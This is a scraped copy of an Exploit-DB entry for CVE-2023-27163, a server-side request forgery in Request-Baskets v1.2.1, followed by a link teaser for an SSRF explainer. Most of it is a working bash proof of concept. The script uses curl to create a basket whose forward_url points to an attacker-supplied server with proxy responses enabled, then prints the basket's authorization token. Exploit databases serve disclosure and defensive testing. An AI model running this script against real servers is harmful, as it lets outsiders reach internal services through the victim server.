[webapps] Request-Baskets v1.2.1 - Server-side request forgery (SSRF)

1 year ago

source link: https://www.exploit-db.com/exploits/51675
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Request-Baskets v1.2.1 - Server-side request forgery (SSRF)

EDB-ID:

51675

Platform:

Date:

2023-08-10

Vulnerable App:

# Exploit Title: Request-Baskets v1.2.1 - Server-side request forgery (SSRF)
# Exploit Author: Iyaad Luqman K (init_6)
# Application: Request-Baskets v1.2.1
# Tested on: Ubuntu 22.04
# CVE: CVE-2023-27163


# PoC
#!/bin/bash


if [ "$#" -lt 2 ] || [ "$1" = "-h" ] || [ "$1" = "--help" ]; then
    help="Usage: exploit.sh <URL> <TARGET>\n\n";
    help+="Arguments:\n" \
    help+=" URL            main path (/) of the server (eg. http://127.0.0.1:5000/)\n";
    help+=" TARGET";

    echo -e "$help";
    exit 1;
fi

URL=$1
ATTACKER_SERVER=$2

if [ "${URL: -1}" != "/" ]; then
    URL="$URL/";
fi;

BASKET_NAME=$(LC_ALL=C tr -dc 'a-z' </dev/urandom | head -c "6");

API_URL="$URL""api/baskets/$BASKET_NAME";

PAYLOAD="{\"forward_url\": \"$ATTACKER_SERVER\",\"proxy_response\": true,\"insecure_tls\": false,\"expand_path\": true,\"capacity\": 250}";

echo "> Creating the \"$BASKET_NAME\" proxy basket...";

if ! response=$(curl -s -X POST -H 'Content-Type: application/json' -d "$PAYLOAD" "$API_URL"); then
    echo "> FATAL: Could not properly request $API_URL. Is the server online?";
    exit 1;
fi;

BASKET_URL="$URL$BASKET_NAME";

echo "> Basket created!";
echo "> Accessing $BASKET_URL now makes the server request to $ATTACKER_SERVER.";

if ! jq --help 1>/dev/null; then
    echo "> Response body (Authorization): $response";
else
    echo "> Authorization: $(echo "$response" | jq -r ".token")";
fi;

exit 0;

Copy

Recommend

blog.sqreen.com 4 years ago
Cache

Server-side request forgery (SSRF), explained

Server-side request forgery (SSRF), explained Web applications have become one of the most important assets for companies of all sizes. And due to this, they have also become a target. Web applications are getting more co...